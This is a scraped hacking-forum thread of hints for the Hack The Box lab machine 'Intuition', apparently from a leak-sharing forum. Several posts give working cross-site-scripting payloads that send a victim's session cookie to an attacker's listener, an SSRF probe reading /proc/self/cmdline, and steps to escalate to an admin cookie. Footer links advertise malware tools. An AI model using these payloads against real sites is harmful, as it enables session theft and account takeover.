HTB- Intuition
by trevor69000 - Saturday April 27, 2024 at 06:46 PM
#71
(Apr 28, 2024, 12:47 PM)ticklemeelmo Wrote: Wait... What is the step after getting the Flask Secret Key??

Find other source files

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#72
(Apr 28, 2024, 09:22 AM)jsvensson Wrote:
(Apr 28, 2024, 09:16 AM)vanatka123 Wrote:
(Apr 28, 2024, 07:34 AM)andlommy Wrote: user, finally
use the SSRF to find application code
use that same ssrf to access the next hop (http is not the only protocol Wink
convert key
profit.

now for the root....

How do you know the location of the source code?

use file:///proc/self/cmdline

Hello guys,

I'm currently stuck for fews hours on the SSRF....
I did this but even i try so many payload i got "unexpected error"...
I put space before file but even i send this to the server i got error.
Anyone  have a little hint please Smile 

<html>
<body>
<h1>Proof that you Signed Your Life Away</h1>
<img src=""><body id="body"> <script>jsImg = new Image();jsImg.src=" file:///proc/self/cmdline";document.getElementById("body").appendChild(jsImg);</script></body></img>
</body>
</html>
Reply
#73
guys , What is the code for returning the cookie?T_T

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#74
[quote="fuliye" pid='587786' dateline='1714309846']
guys , What is the code for returning the cookie?T_T
[/citar]

 1º listener =  python3 -m http.server 80
 
2º = <script>var i=new Image(); i.src="http://10.10.xx.xx:80/?cookie="+btoa(document.cookie);</script>

and then waiting for the python server to capture the cookie can take some time....patience

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Reply
#75
You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>

Wait listening with python3 -m http.server

---

I'm stucked now as root inside a container. Does anyone know how to breakout?
Reply
#76
(Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>

Wait listening with python3 -m http.server

---

I'm stucked now as root inside a container. Does anyone know how to breakout?

Bro we use ssrf to get the private key after getting the cookie or what is the next step .. I saw someone said there is another cookie for whom ? Can u explain

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#77
I found out that there is a ftp connection, do I need to use this connection to get the private key?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#78
(Apr 28, 2024, 01:47 PM)query1338 Wrote: I found out that there is a ftp connection, do I need to use this connection to get the private key?

yes you use these creds to get the private key for user

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#79
(Apr 28, 2024, 01:45 PM)osamy7593 Wrote:
(Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>

Wait listening with python3 -m http.server

---

I'm stucked now as root inside a container. Does anyone know how to breakout?

Bro we use ssrf to get the private key after getting the cookie or what is the next step .. I saw someone said there is another cookie for whom ? Can u explain


Sure, there is another thing to do.

First you receive a cookie for user called "adam". When you access like adam inside the dashboard, you can change reports priority.

Now, send again the XSS and quickly update the priority to 1.

Thee you go the second request with the new cookie as "admin".
Reply
#80
(Apr 28, 2024, 01:50 PM)ConnorHack Wrote:
(Apr 28, 2024, 01:45 PM)osamy7593 Wrote:
(Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>

Wait listening with python3 -m http.server

---

I'm stucked now as root inside a container. Does anyone know how to breakout?

Bro we use ssrf to get the private key after getting the cookie or what is the next step .. I saw someone said there is another cookie for whom ? Can u explain


Sure, there is another thing to do.

First you receive a cookie for user called "adam". When you access like adam inside the dashboard, you can change reports priority.

Now, send again the XSS and quickly update the priority to 1.

Thee you go the second request with the new cookie as "admin".

Thx man

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 45 3,558 1 minute ago
Last Post: Marcorea
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 98 8,994 6 hours ago
Last Post: Zacker90
  SVCHOST Injector 2026 opsecmaster67 0 77 Yesterday, 01:41 PM
Last Post: opsecmaster67
  Cold Seal 5.6 cracked Sensitive information can be exposed or stolen opsecmaster67 0 64 Yesterday, 01:38 PM
Last Post: opsecmaster67
  EagleRAT v2.5 Create backdoor access points opsecmaster67 0 59 Yesterday, 01:37 PM
Last Post: opsecmaster67

Forum Jump:


 Users browsing this forum: 2 Guest(s)